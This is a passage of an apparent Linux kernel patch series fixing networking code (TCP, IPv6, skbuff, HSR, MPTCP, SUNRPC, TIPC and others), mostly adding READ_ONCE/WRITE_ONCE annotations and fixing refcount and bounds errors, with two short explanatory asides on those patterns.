++	operstate = READ_ONCE(netdev->operstate);
+ 	if (!netif_running(netdev))
+ 		operstate = IF_OPER_DOWN;
+-	read_unlock(&dev_base_lock);
+ 
+ 	if (operstate >= ARRAY_SIZE(operstates))
+ 		return -EINVAL; /* should not happen */
+diff --git a/net/core/net_namespace.c b/net/core/net_namespace.c
+index 4c1707d0eb9b0..c33930a171629 100644
+--- a/net/core/net_namespace.c
++++ b/net/core/net_namespace.c
+@@ -68,12 +68,15 @@ DEFINE_COOKIE(net_cookie);
+ 
+ static struct net_generic *net_alloc_generic(void)
+ {
++	unsigned int gen_ptrs = READ_ONCE(max_gen_ptrs);
++	unsigned int generic_size;
+ 	struct net_generic *ng;
+-	unsigned int generic_size = offsetof(struct net_generic, ptr[max_gen_ptrs]);
++
++	generic_size = offsetof(struct net_generic, ptr[gen_ptrs]);
+ 
+ 	ng = kzalloc(generic_size, GFP_KERNEL);
+ 	if (ng)
+-		ng->s.len = max_gen_ptrs;
++		ng->s.len = gen_ptrs;
+ 
+ 	return ng;
+ }
+@@ -1217,7 +1220,11 @@ static int register_pernet_operations(struct list_head *list,
+ 		if (error < 0)
+ 			return error;
+ 		*ops->id = error;
+-		max_gen_ptrs = max(max_gen_ptrs, *ops->id + 1);
++		/* This does not require READ_ONCE as writers already hold
++		 * pernet_ops_rwsem. But WRITE_ONCE is needed to protect
++		 * net_alloc_generic.
++		 */
++		WRITE_ONCE(max_gen_ptrs, max(max_gen_ptrs, *ops->id + 1));
+ 	}
+ 	error = __register_pernet_operations(list, ops);
+ 	if (error) {
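
Several hunks in this batch (dev->operstate, sk->sk_rcvbuf, max_gen_ptrs, disable_ipv6) apply the same annotation pattern: writers keep their existing lock, but since readers are lockless, both sides are marked with WRITE_ONCE()/READ_ONCE() so the compiler cannot tear or reorder the accesses. The pattern in miniature, with hypothetical names:

#include <linux/compiler.h>

static int example_shared;	/* written under a lock, read locklessly */

static void example_writer(int v)
{
	/* The writer's own lock serializes writers; WRITE_ONCE() keeps
	 * the store from being torn or reordered by the compiler.
	 */
	WRITE_ONCE(example_shared, v);
}

static int example_reader(void)
{
	/* Lockless readers pair with the writer via READ_ONCE(). */
	return READ_ONCE(example_shared);
}
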
+diff --git a/net/core/rtnetlink.c b/net/core/rtnetlink.c
+index ac379e4590f8d..1163226c025c1 100644
+--- a/net/core/rtnetlink.c
++++ b/net/core/rtnetlink.c
+@@ -876,9 +876,9 @@ static void set_operstate(struct net_device *dev, unsigned char transition)
+ 		break;
+ 	}
+ 
+-	if (dev->operstate != operstate) {
++	if (READ_ONCE(dev->operstate) != operstate) {
+ 		write_lock(&dev_base_lock);
+-		dev->operstate = operstate;
++		WRITE_ONCE(dev->operstate, operstate);
+ 		write_unlock(&dev_base_lock);
+ 		netdev_state_change(dev);
+ 	}
+@@ -2443,7 +2443,7 @@ static int do_setvfinfo(struct net_device *dev, struct nlattr **tb)
+ 
+ 		nla_for_each_nested(attr, tb[IFLA_VF_VLAN_LIST], rem) {
+ 			if (nla_type(attr) != IFLA_VF_VLAN_INFO ||
+-			    nla_len(attr) < NLA_HDRLEN) {
++			    nla_len(attr) < sizeof(struct ifla_vf_vlan_info)) {
+ 				return -EINVAL;
+ 			}
+ 			if (len >= MAX_VLAN_LIST_LEN)
+diff --git a/net/core/skbuff.c b/net/core/skbuff.c
+index e38a4c7449f62..4d46788cd493a 100644
+--- a/net/core/skbuff.c
++++ b/net/core/skbuff.c
+@@ -1720,11 +1720,17 @@ static inline int skb_alloc_rx_flag(const struct sk_buff *skb)
+ 
+ struct sk_buff *skb_copy(const struct sk_buff *skb, gfp_t gfp_mask)
+ {
+-	int headerlen = skb_headroom(skb);
+-	unsigned int size = skb_end_offset(skb) + skb->data_len;
+-	struct sk_buff *n = __alloc_skb(size, gfp_mask,
+-					skb_alloc_rx_flag(skb), NUMA_NO_NODE);
++	struct sk_buff *n;
++	unsigned int size;
++	int headerlen;
++
++	if (WARN_ON_ONCE(skb_shinfo(skb)->gso_type & SKB_GSO_FRAGLIST))
++		return NULL;
+ 
++	headerlen = skb_headroom(skb);
++	size = skb_end_offset(skb) + skb->data_len;
++	n = __alloc_skb(size, gfp_mask,
++			skb_alloc_rx_flag(skb), NUMA_NO_NODE);
+ 	if (!n)
+ 		return NULL;
+ 
+@@ -2037,12 +2043,17 @@ struct sk_buff *skb_copy_expand(const struct sk_buff *skb,
+ 	/*
+ 	 *	Allocate the copy buffer
+ 	 */
+-	struct sk_buff *n = __alloc_skb(newheadroom + skb->len + newtailroom,
+-					gfp_mask, skb_alloc_rx_flag(skb),
+-					NUMA_NO_NODE);
+-	int oldheadroom = skb_headroom(skb);
+ 	int head_copy_len, head_copy_off;
++	struct sk_buff *n;
++	int oldheadroom;
++
++	if (WARN_ON_ONCE(skb_shinfo(skb)->gso_type & SKB_GSO_FRAGLIST))
++		return NULL;
+ 
++	oldheadroom = skb_headroom(skb);
++	n = __alloc_skb(newheadroom + skb->len + newtailroom,
++			gfp_mask, skb_alloc_rx_flag(skb),
++			NUMA_NO_NODE);
+ 	if (!n)
+ 		return NULL;
+ 
+diff --git a/net/core/skmsg.c b/net/core/skmsg.c
+index 39643f78cf782..8b0459a6b629f 100644
+--- a/net/core/skmsg.c
++++ b/net/core/skmsg.c
+@@ -1217,11 +1217,8 @@ static void sk_psock_verdict_data_ready(struct sock *sk)
+ 
+ 		rcu_read_lock();
+ 		psock = sk_psock(sk);
+-		if (psock) {
+-			read_lock_bh(&sk->sk_callback_lock);
++		if (psock)
+ 			sk_psock_data_ready(sk, psock);
+-			read_unlock_bh(&sk->sk_callback_lock);
+-		}
+ 		rcu_read_unlock();
+ 	}
+ }
+diff --git a/net/core/sock.c b/net/core/sock.c
+index 550af616f5359..48199e6e8f161 100644
+--- a/net/core/sock.c
++++ b/net/core/sock.c
+@@ -482,7 +482,7 @@ int __sock_queue_rcv_skb(struct sock *sk, struct sk_buff *skb)
+ 	unsigned long flags;
+ 	struct sk_buff_head *list = &sk->sk_receive_queue;
+ 
+-	if (atomic_read(&sk->sk_rmem_alloc) >= sk->sk_rcvbuf) {
++	if (atomic_read(&sk->sk_rmem_alloc) >= READ_ONCE(sk->sk_rcvbuf)) {
+ 		atomic_inc(&sk->sk_drops);
+ 		trace_sock_rcvqueue_full(sk, skb);
+ 		return -ENOMEM;
+@@ -552,7 +552,7 @@ int __sk_receive_skb(struct sock *sk, struct sk_buff *skb,
+ 
+ 	skb->dev = NULL;
+ 
+-	if (sk_rcvqueues_full(sk, sk->sk_rcvbuf)) {
++	if (sk_rcvqueues_full(sk, READ_ONCE(sk->sk_rcvbuf))) {
+ 		atomic_inc(&sk->sk_drops);
+ 		goto discard_and_relse;
+ 	}
+diff --git a/net/hsr/hsr_device.c b/net/hsr/hsr_device.c
+index 83906d093f0ae..ad75724b69adf 100644
+--- a/net/hsr/hsr_device.c
++++ b/net/hsr/hsr_device.c
+@@ -31,8 +31,8 @@ static bool is_slave_up(struct net_device *dev)
+ static void __hsr_set_operstate(struct net_device *dev, int transition)
+ {
+ 	write_lock(&dev_base_lock);
+-	if (dev->operstate != transition) {
+-		dev->operstate = transition;
++	if (READ_ONCE(dev->operstate) != transition) {
++		WRITE_ONCE(dev->operstate, transition);
+ 		write_unlock(&dev_base_lock);
+ 		netdev_state_change(dev);
+ 	} else {
+@@ -71,39 +71,36 @@ static bool hsr_check_carrier(struct hsr_port *master)
+ 	return false;
+ }
+ 
+-static void hsr_check_announce(struct net_device *hsr_dev,
+-			       unsigned char old_operstate)
++static void hsr_check_announce(struct net_device *hsr_dev)
+ {
+ 	struct hsr_priv *hsr;
+ 
+ 	hsr = netdev_priv(hsr_dev);
+-
+-	if (hsr_dev->operstate == IF_OPER_UP && old_operstate != IF_OPER_UP) {
+-		/* Went up */
+-		hsr->announce_count = 0;
+-		mod_timer(&hsr->announce_timer,
+-			  jiffies + msecs_to_jiffies(HSR_ANNOUNCE_INTERVAL));
++	if (netif_running(hsr_dev) && netif_oper_up(hsr_dev)) {
++		/* Enable announce timer and start sending supervisory frames */
++		if (!timer_pending(&hsr->announce_timer)) {
++			hsr->announce_count = 0;
++			mod_timer(&hsr->announce_timer, jiffies +
++				  msecs_to_jiffies(HSR_ANNOUNCE_INTERVAL));
++		}
++	} else {
++		/* Deactivate the announce timer */
++		timer_delete(&hsr->announce_timer);
+ 	}
+-
+-	if (hsr_dev->operstate != IF_OPER_UP && old_operstate == IF_OPER_UP)
+-		/* Went down */
+-		del_timer(&hsr->announce_timer);
+ }
+ 
+ void hsr_check_carrier_and_operstate(struct hsr_priv *hsr)
+ {
+ 	struct hsr_port *master;
+-	unsigned char old_operstate;
+ 	bool has_carrier;
+ 
+ 	master = hsr_port_get_hsr(hsr, HSR_PT_MASTER);
+ 	/* netif_stacked_transfer_operstate() cannot be used here since
+ 	 * it doesn't set IF_OPER_LOWERLAYERDOWN (?)
+ 	 */
+-	old_operstate = master->dev->operstate;
+ 	has_carrier = hsr_check_carrier(master);
+ 	hsr_set_operstate(master, has_carrier);
+-	hsr_check_announce(master->dev, old_operstate);
++	hsr_check_announce(master->dev);
+ }
+ 
+ int hsr_get_max_mtu(struct hsr_priv *hsr)
+diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
+index f01c0a5d2c37b..3447a09ee83a2 100644
+--- a/net/ipv4/tcp.c
++++ b/net/ipv4/tcp.c
+@@ -2831,7 +2831,7 @@ void tcp_shutdown(struct sock *sk, int how)
+ 	/* If we've already sent a FIN, or it's a closed state, skip this. */
+ 	if ((1 << sk->sk_state) &
+ 	    (TCPF_ESTABLISHED | TCPF_SYN_SENT |
+-	     TCPF_SYN_RECV | TCPF_CLOSE_WAIT)) {
++	     TCPF_CLOSE_WAIT)) {
+ 		/* Clear out any half completed packets.  FIN if needed. */
+ 		if (tcp_close_state(sk))
+ 			tcp_send_fin(sk);
+@@ -2940,7 +2940,7 @@ void __tcp_close(struct sock *sk, long timeout)
+ 		 * machine. State transitions:
+ 		 *
+ 		 * TCP_ESTABLISHED -> TCP_FIN_WAIT1
+-		 * TCP_SYN_RECV	-> TCP_FIN_WAIT1 (forget it, it's impossible)
++		 * TCP_SYN_RECV	-> TCP_FIN_WAIT1 (it is difficult)
+ 		 * TCP_CLOSE_WAIT -> TCP_LAST_ACK
+ 		 *
+ 		 * are legal only when FIN has been sent (i.e. in window),
+diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
+index 34460c9b37ae2..4c9da94553365 100644
+--- a/net/ipv4/tcp_input.c
++++ b/net/ipv4/tcp_input.c
+@@ -6597,6 +6597,8 @@ int tcp_rcv_state_process(struct sock *sk, struct sk_buff *skb)
+ 
+ 		tcp_initialize_rcv_mss(sk);
+ 		tcp_fast_path_on(tp);
++		if (sk->sk_shutdown & SEND_SHUTDOWN)
++			tcp_shutdown(sk, SEND_SHUTDOWN);
+ 		break;
+ 
+ 	case TCP_FIN_WAIT1: {
+diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c
+index be2c807eed15d..5dcb969cb5e9c 100644
+--- a/net/ipv4/tcp_ipv4.c
++++ b/net/ipv4/tcp_ipv4.c
+@@ -153,6 +153,12 @@ int tcp_twsk_unique(struct sock *sk, struct sock *sktw, void *twp)
+ 	if (tcptw->tw_ts_recent_stamp &&
+ 	    (!twp || (reuse && time_after32(ktime_get_seconds(),
+ 					    tcptw->tw_ts_recent_stamp)))) {
++		/* inet_twsk_hashdance() sets sk_refcnt after putting twsk
++		 * and releasing the bucket lock.
++		 */
++		if (unlikely(!refcount_inc_not_zero(&sktw->sk_refcnt)))
++			return 0;
++
+ 		/* In case of repair and re-using TIME-WAIT sockets we still
+ 		 * want to be sure that it is safe as above but honor the
+ 		 * sequence numbers and time stamps set as part of the repair
+@@ -173,7 +179,7 @@ int tcp_twsk_unique(struct sock *sk, struct sock *sktw, void *twp)
+ 			tp->rx_opt.ts_recent	   = tcptw->tw_ts_recent;
+ 			tp->rx_opt.ts_recent_stamp = tcptw->tw_ts_recent_stamp;
+ 		}
+-		sock_hold(sktw);
++
+ 		return 1;
+ 	}
+ 
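
The tcp_twsk_unique() fix above swaps an unconditional sock_hold() for refcount_inc_not_zero(): inet_twsk_hashdance() only sets sk_refcnt after releasing the bucket lock, so a lookup may observe the timewait socket while its count is still zero and must take a reference only if one is already held. The generic shape of the pattern, with hypothetical names:

#include <linux/refcount.h>

struct example_obj {
	refcount_t ref;
};

/* Hypothetical lookup-side helper: take a reference only if the object
 * is already live. A plain refcount_inc() here could "resurrect" an
 * object that is still being published (or already being freed).
 */
static struct example_obj *example_get(struct example_obj *obj)
{
	if (!refcount_inc_not_zero(&obj->ref))
		return NULL;	/* lost the race; caller bails out */
	return obj;
}
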
+diff --git a/net/ipv4/tcp_output.c b/net/ipv4/tcp_output.c
+index 67087da45a1f7..15f814c1e1693 100644
+--- a/net/ipv4/tcp_output.c
++++ b/net/ipv4/tcp_output.c
+@@ -3480,7 +3480,9 @@ void tcp_send_fin(struct sock *sk)
+ 			return;
+ 		}
+ 	} else {
+-		skb = alloc_skb_fclone(MAX_TCP_HEADER, sk->sk_allocation);
++		skb = alloc_skb_fclone(MAX_TCP_HEADER,
++				       sk_gfp_mask(sk, GFP_ATOMIC |
++						       __GFP_NOWARN));
+ 		if (unlikely(!skb))
+ 			return;
+ 
+diff --git a/net/ipv4/udp_offload.c b/net/ipv4/udp_offload.c
+index 84b7d6089f76c..794ea24292f62 100644
+--- a/net/ipv4/udp_offload.c
++++ b/net/ipv4/udp_offload.c
+@@ -463,6 +463,7 @@ static struct sk_buff *udp_gro_receive_segment(struct list_head *head,
+ 	struct sk_buff *p;
+ 	unsigned int ulen;
+ 	int ret = 0;
++	int flush;
+ 
+ 	/* requires non zero csum, for symmetry with GSO */
+ 	if (!uh->check) {
+@@ -496,13 +497,22 @@ static struct sk_buff *udp_gro_receive_segment(struct list_head *head,
+ 			return p;
+ 		}
+ 
++		flush = NAPI_GRO_CB(p)->flush;
++
++		if (NAPI_GRO_CB(p)->flush_id != 1 ||
++		    NAPI_GRO_CB(p)->count != 1 ||
++		    !NAPI_GRO_CB(p)->is_atomic)
++			flush |= NAPI_GRO_CB(p)->flush_id;
++		else
++			NAPI_GRO_CB(p)->is_atomic = false;
++
+ 		/* Terminate the flow on len mismatch or if it grows "too much".
+ 		 * Under a small packet flood the GRO count could otherwise grow
+ 		 * a lot, leading to excessive truesize values.
+ 		 * On len mismatch merge the first packet shorter than gso_size,
+ 		 * otherwise complete the GRO packet.
+ 		 */
+-		if (ulen > ntohs(uh2->len)) {
++		if (ulen > ntohs(uh2->len) || flush) {
+ 			pp = p;
+ 		} else {
+ 			if (NAPI_GRO_CB(skb)->is_flist) {
+diff --git a/net/ipv4/xfrm4_input.c b/net/ipv4/xfrm4_input.c
+index 183f6dc372429..f6e90ba50b639 100644
+--- a/net/ipv4/xfrm4_input.c
++++ b/net/ipv4/xfrm4_input.c
+@@ -61,7 +61,11 @@ int xfrm4_transport_finish(struct sk_buff *skb, int async)
+ 	ip_send_check(iph);
+ 
+ 	if (xo && (xo->flags & XFRM_GRO)) {
+-		skb_mac_header_rebuild(skb);
++		/* The full l2 header needs to be preserved so that re-injecting the packet at l2
++		 * works correctly in the presence of vlan tags.
++		 */
++		skb_mac_header_rebuild_full(skb, xo->orig_mac_len);
++		skb_reset_network_header(skb);
+ 		skb_reset_transport_header(skb);
+ 		return 0;
+ 	}
+diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c
+index 3866deaadbb66..22e246ff910ee 100644
+--- a/net/ipv6/addrconf.c
++++ b/net/ipv6/addrconf.c
+@@ -4133,7 +4133,7 @@ static void addrconf_dad_work(struct work_struct *w)
+ 			if (!ipv6_generate_eui64(addr.s6_addr + 8, idev->dev) &&
+ 			    ipv6_addr_equal(&ifp->addr, &addr)) {
+ 				/* DAD failed for link-local based on MAC */
+-				idev->cnf.disable_ipv6 = 1;
++				WRITE_ONCE(idev->cnf.disable_ipv6, 1);
+ 
+ 				pr_info("%s: IPv6 being disabled!\n",
+ 					ifp->idev->dev->name);
+@@ -5979,7 +5979,7 @@ static int inet6_fill_ifinfo(struct sk_buff *skb, struct inet6_dev *idev,
+ 	    (dev->ifindex != dev_get_iflink(dev) &&
+ 	     nla_put_u32(skb, IFLA_LINK, dev_get_iflink(dev))) ||
+ 	    nla_put_u8(skb, IFLA_OPERSTATE,
+-		       netif_running(dev) ? dev->operstate : IF_OPER_DOWN))
++		       netif_running(dev) ? READ_ONCE(dev->operstate) : IF_OPER_DOWN))
+ 		goto nla_put_failure;
+ 	protoinfo = nla_nest_start_noflag(skb, IFLA_PROTINFO);
+ 	if (!protoinfo)
+@@ -6289,7 +6289,8 @@ static void addrconf_disable_change(struct net *net, __s32 newf)
+ 		idev = __in6_dev_get(dev);
+ 		if (idev) {
+ 			int changed = (!idev->cnf.disable_ipv6) ^ (!newf);
+-			idev->cnf.disable_ipv6 = newf;
++
++			WRITE_ONCE(idev->cnf.disable_ipv6, newf);
+ 			if (changed)
+ 				dev_disable_change(idev);
+ 		}
+@@ -6306,7 +6307,7 @@ static int addrconf_disable_ipv6(struct ctl_table *table, int *p, int newf)
+ 
+ 	net = (struct net *)table->extra2;
+ 	old = *p;
+-	*p = newf;
++	WRITE_ONCE(*p, newf);
+ 
+ 	if (p == &net->ipv6.devconf_dflt->disable_ipv6) {
+ 		rtnl_unlock();
+@@ -6314,7 +6315,7 @@ static int addrconf_disable_ipv6(struct ctl_table *table, int *p, int newf)
+ 	}
+ 
+ 	if (p == &net->ipv6.devconf_all->disable_ipv6) {
+-		net->ipv6.devconf_dflt->disable_ipv6 = newf;
++		WRITE_ONCE(net->ipv6.devconf_dflt->disable_ipv6, newf);
+ 		addrconf_disable_change(net, newf);
+ 	} else if ((!newf) ^ (!old))
+ 		dev_disable_change((struct inet6_dev *)table->extra1);
+diff --git a/net/ipv6/fib6_rules.c b/net/ipv6/fib6_rules.c
+index be52b18e08a6b..6eeab21512ba9 100644
+--- a/net/ipv6/fib6_rules.c
++++ b/net/ipv6/fib6_rules.c
+@@ -233,8 +233,12 @@ static int __fib6_rule_action(struct fib_rule *rule, struct flowi *flp,
+ 	rt = pol_lookup_func(lookup,
+ 			     net, table, flp6, arg->lookup_data, flags);
+ 	if (rt != net->ipv6.ip6_null_entry) {
++		struct inet6_dev *idev = ip6_dst_idev(&rt->dst);
++
++		if (!idev)
++			goto again;
+ 		err = fib6_rule_saddr(net, rule, flags, flp6,
+-				      ip6_dst_idev(&rt->dst)->dev);
++				      idev->dev);
+ 
+ 		if (err == -EAGAIN)
+ 			goto again;
+diff --git a/net/ipv6/ip6_input.c b/net/ipv6/ip6_input.c
+index b8378814532ce..1ba97933c74fb 100644
+--- a/net/ipv6/ip6_input.c
++++ b/net/ipv6/ip6_input.c
+@@ -168,9 +168,9 @@ static struct sk_buff *ip6_rcv_core(struct sk_buff *skb, struct net_device *dev,
+ 
+ 	SKB_DR_SET(reason, NOT_SPECIFIED);
+ 	if ((skb = skb_share_check(skb, GFP_ATOMIC)) == NULL ||
+-	    !idev || unlikely(idev->cnf.disable_ipv6)) {
++	    !idev || unlikely(READ_ONCE(idev->cnf.disable_ipv6))) {
+ 		__IP6_INC_STATS(net, idev, IPSTATS_MIB_INDISCARDS);
+-		if (idev && unlikely(idev->cnf.disable_ipv6))
++		if (idev && unlikely(READ_ONCE(idev->cnf.disable_ipv6)))
+ 			SKB_DR_SET(reason, IPV6DISABLED);
+ 		goto drop;
+ 	}
+diff --git a/net/ipv6/ip6_output.c b/net/ipv6/ip6_output.c
+index e9ae084d038d1..fb26401950e7e 100644
+--- a/net/ipv6/ip6_output.c
++++ b/net/ipv6/ip6_output.c
+@@ -224,7 +224,7 @@ int ip6_output(struct net *net, struct sock *sk, struct sk_buff *skb)
+ 	skb->protocol = htons(ETH_P_IPV6);
+ 	skb->dev = dev;
+ 
+-	if (unlikely(idev->cnf.disable_ipv6)) {
++	if (unlikely(!idev || READ_ONCE(idev->cnf.disable_ipv6))) {
+ 		IP6_INC_STATS(net, idev, IPSTATS_MIB_OUTDISCARDS);
+ 		kfree_skb_reason(skb, SKB_DROP_REASON_IPV6DISABLED);
+ 		return 0;
+diff --git a/net/ipv6/xfrm6_input.c b/net/ipv6/xfrm6_input.c
+index 4156387248e40..8432b50d9ce4c 100644
+--- a/net/ipv6/xfrm6_input.c
++++ b/net/ipv6/xfrm6_input.c
+@@ -56,7 +56,11 @@ int xfrm6_transport_finish(struct sk_buff *skb, int async)
+ 	skb_postpush_rcsum(skb, skb_network_header(skb), nhlen);
+ 
+ 	if (xo && (xo->flags & XFRM_GRO)) {
+-		skb_mac_header_rebuild(skb);
++		/* The full l2 header needs to be preserved so that re-injecting the packet at l2
++		 * works correctly in the presence of vlan tags.
++		 */
++		skb_mac_header_rebuild_full(skb, xo->orig_mac_len);
++		skb_reset_network_header(skb);
+ 		skb_reset_transport_header(skb);
+ 		return 0;
+ 	}
+diff --git a/net/l2tp/l2tp_eth.c b/net/l2tp/l2tp_eth.c
+index f2ae03c404736..1f41d2f3b8c4e 100644
+--- a/net/l2tp/l2tp_eth.c
++++ b/net/l2tp/l2tp_eth.c
+@@ -136,6 +136,9 @@ static void l2tp_eth_dev_recv(struct l2tp_session *session, struct sk_buff *skb,
+ 	/* checksums verified by L2TP */
+ 	skb->ip_summed = CHECKSUM_NONE;
+ 
++	/* drop outer flow-hash */
++	skb_clear_hash(skb);
++
+ 	skb_dst_drop(skb);
+ 	nf_reset_ct(skb);
+ 
+diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h
+index d5dd2d9e89b48..3e14d5c9aa1b4 100644
+--- a/net/mac80211/ieee80211_i.h
++++ b/net/mac80211/ieee80211_i.h
+@@ -120,7 +120,7 @@ struct ieee80211_bss {
+ };
+ 
+ /**
+- * enum ieee80211_corrupt_data_flags - BSS data corruption flags
++ * enum ieee80211_bss_corrupt_data_flags - BSS data corruption flags
+  * @IEEE80211_BSS_CORRUPT_BEACON: last beacon frame received was corrupted
+  * @IEEE80211_BSS_CORRUPT_PROBE_RESP: last probe response received was corrupted
+  *
+@@ -133,7 +133,7 @@ enum ieee80211_bss_corrupt_data_flags {
+ };
+ 
+ /**
+- * enum ieee80211_valid_data_flags - BSS valid data flags
++ * enum ieee80211_bss_valid_data_flags - BSS valid data flags
+  * @IEEE80211_BSS_VALID_WMM: WMM/UAPSD data was gathered from non-corrupt IE
+  * @IEEE80211_BSS_VALID_RATES: Supported rates were gathered from non-corrupt IE
+  * @IEEE80211_BSS_VALID_ERP: ERP flag was gathered from non-corrupt IE
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index c652c8ca765c2..b6815610a6fa1 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -3754,6 +3754,9 @@ static int mptcp_connect(struct sock *sk, struct sockaddr *uaddr, int addr_len)
+ 		MPTCP_INC_STATS(sock_net(ssock->sk), MPTCP_MIB_TOKENFALLBACKINIT);
+ 		mptcp_subflow_early_fallback(msk, subflow);
+ 	}
++
++	WRITE_ONCE(msk->write_seq, subflow->idsn);
++	WRITE_ONCE(msk->snd_nxt, subflow->idsn);
+ 	if (likely(!__mptcp_check_fallback(msk)))
+ 		MPTCP_INC_STATS(sock_net(sk), MPTCP_MIB_MPCAPABLEACTIVE);
+ 
+diff --git a/net/nsh/nsh.c b/net/nsh/nsh.c
+index 0f23e5e8e03eb..3e0fc71d95a14 100644
+--- a/net/nsh/nsh.c
++++ b/net/nsh/nsh.c
+@@ -76,13 +76,15 @@ EXPORT_SYMBOL_GPL(nsh_pop);
+ static struct sk_buff *nsh_gso_segment(struct sk_buff *skb,
+ 				       netdev_features_t features)
+ {
++	unsigned int outer_hlen, mac_len, nsh_len;
+ 	struct sk_buff *segs = ERR_PTR(-EINVAL);
+ 	u16 mac_offset = skb->mac_header;
+-	unsigned int nsh_len, mac_len;
+-	__be16 proto;
++	__be16 outer_proto, proto;
+ 
+ 	skb_reset_network_header(skb);
+ 
++	outer_proto = skb->protocol;
++	outer_hlen = skb_mac_header_len(skb);
+ 	mac_len = skb->mac_len;
+ 
+ 	if (unlikely(!pskb_may_pull(skb, NSH_BASE_HDR_LEN)))
+@@ -112,10 +114,10 @@ static struct sk_buff *nsh_gso_segment(struct sk_buff *skb,
+ 	}
+ 
+ 	for (skb = segs; skb; skb = skb->next) {
+-		skb->protocol = htons(ETH_P_NSH);
+-		__skb_push(skb, nsh_len);
+-		skb->mac_header = mac_offset;
+-		skb->network_header = skb->mac_header + mac_len;
++		skb->protocol = outer_proto;
++		__skb_push(skb, nsh_len + outer_hlen);
++		skb_reset_mac_header(skb);
++		skb_set_network_header(skb, outer_hlen);
+ 		skb->mac_len = mac_len;
+ 	}
+ 
+diff --git a/net/phonet/pn_netlink.c b/net/phonet/pn_netlink.c
+index 59aebe2968907..dd4c7e9a634fb 100644
+--- a/net/phonet/pn_netlink.c
++++ b/net/phonet/pn_netlink.c
+@@ -193,7 +193,7 @@ void rtm_phonet_notify(int event, struct net_device *dev, u8 dst)
+ 	struct sk_buff *skb;
+ 	int err = -ENOBUFS;
+ 
+-	skb = nlmsg_new(NLMSG_ALIGN(sizeof(struct ifaddrmsg)) +
++	skb = nlmsg_new(NLMSG_ALIGN(sizeof(struct rtmsg)) +
+ 			nla_total_size(1) + nla_total_size(4), GFP_KERNEL);
+ 	if (skb == NULL)
+ 		goto errout;
+diff --git a/net/smc/smc_ib.c b/net/smc/smc_ib.c
+index ace8611735321..6de53431629ca 100644
+--- a/net/smc/smc_ib.c
++++ b/net/smc/smc_ib.c
+@@ -209,13 +209,18 @@ int smc_ib_find_route(struct net *net, __be32 saddr, __be32 daddr,
+ 	if (IS_ERR(rt))
+ 		goto out;
+ 	if (rt->rt_uses_gateway && rt->rt_gw_family != AF_INET)
+-		goto out;
+-	neigh = rt->dst.ops->neigh_lookup(&rt->dst, NULL, &fl4.daddr);
+-	if (neigh) {
+-		memcpy(nexthop_mac, neigh->ha, ETH_ALEN);
+-		*uses_gateway = rt->rt_uses_gateway;
+-		return 0;
+-	}
++		goto out_rt;
++	neigh = dst_neigh_lookup(&rt->dst, &fl4.daddr);
++	if (!neigh)
++		goto out_rt;
++	memcpy(nexthop_mac, neigh->ha, ETH_ALEN);
++	*uses_gateway = rt->rt_uses_gateway;
++	neigh_release(neigh);
++	ip_rt_put(rt);
++	return 0;
++
++out_rt:
++	ip_rt_put(rt);
+ out:
+ 	return -ENOENT;
+ }
+diff --git a/net/sunrpc/clnt.c b/net/sunrpc/clnt.c
+index 61e5c77462e94..b774028e4aa8f 100644
+--- a/net/sunrpc/clnt.c
++++ b/net/sunrpc/clnt.c
+@@ -398,7 +398,7 @@ static struct rpc_clnt * rpc_new_client(const struct rpc_create_args *args,
+ 	clnt->cl_maxproc  = version->nrprocs;
+ 	clnt->cl_prog     = args->prognumber ? : program->number;
+ 	clnt->cl_vers     = version->number;
+-	clnt->cl_stats    = program->stats;
++	clnt->cl_stats    = args->stats ? : program->stats;
+ 	clnt->cl_metrics  = rpc_alloc_iostats(clnt);
+ 	rpc_init_pipe_dir_head(&clnt->cl_pipedir_objects);
+ 	err = -ENOMEM;
+@@ -677,6 +677,7 @@ struct rpc_clnt *rpc_clone_client(struct rpc_clnt *clnt)
+ 		.version	= clnt->cl_vers,
+ 		.authflavor	= clnt->cl_auth->au_flavor,
+ 		.cred		= clnt->cl_cred,
++		.stats		= clnt->cl_stats,
+ 	};
+ 	return __rpc_clone_client(&args, clnt);
+ }
+@@ -699,6 +700,7 @@ rpc_clone_client_set_auth(struct rpc_clnt *clnt, rpc_authflavor_t flavor)
+ 		.version	= clnt->cl_vers,
+ 		.authflavor	= flavor,
+ 		.cred		= clnt->cl_cred,
++		.stats		= clnt->cl_stats,
+ 	};
+ 	return __rpc_clone_client(&args, clnt);
+ }
+@@ -1044,6 +1046,7 @@ struct rpc_clnt *rpc_bind_new_program(struct rpc_clnt *old,
+ 		.version	= vers,
+ 		.authflavor	= old->cl_auth->au_flavor,
+ 		.cred		= old->cl_cred,
++		.stats		= old->cl_stats,
+ 	};
+ 	struct rpc_clnt *clnt;
+ 	int err;
+diff --git a/net/sunrpc/xprt.c b/net/sunrpc/xprt.c
+index 656cec2083718..ab453ede54f0c 100644
+--- a/net/sunrpc/xprt.c
++++ b/net/sunrpc/xprt.c
+@@ -1164,7 +1164,7 @@ xprt_request_enqueue_receive(struct rpc_task *task)
+ 	spin_unlock(&xprt->queue_lock);
+ 
+ 	/* Turn off autodisconnect */
+-	del_singleshot_timer_sync(&xprt->timer);
++	del_timer_sync(&xprt->timer);
+ 	return 0;
+ }
+ 
+diff --git a/net/tipc/msg.c b/net/tipc/msg.c
+index 5c9fd4791c4ba..76284fc538ebd 100644
+--- a/net/tipc/msg.c
++++ b/net/tipc/msg.c
+@@ -142,9 +142,9 @@ int tipc_buf_append(struct sk_buff **headbuf, struct sk_buff **buf)
+ 	if (fragid == FIRST_FRAGMENT) {
+ 		if (unlikely(head))
+ 			goto err;
+-		*buf = NULL;
+ 		if (skb_has_frag_list(frag) && __skb_linearize(frag))
+ 			goto err;
++		*buf = NULL;
+ 		frag = skb_unshare(frag, GFP_ATOMIC);
+ 		if (unlikely(!frag))
+ 			goto err;
+@@ -156,6 +156,11 @@ int tipc_buf_append(struct sk_buff **headbuf, struct sk_buff **buf)
+ 	if (!head)
+ 		goto err;
+ 
++	/* Either the input skb ownership is transferred to headskb
++	 * or the input skb is freed; either way, clear the reference
++	 * to avoid a bad access on the error path.
++	 */
++	*buf = NULL;
+ 	if (skb_try_coalesce(head, frag, &headstolen, &delta)) {
+ 		kfree_skb_partial(frag, headstolen);
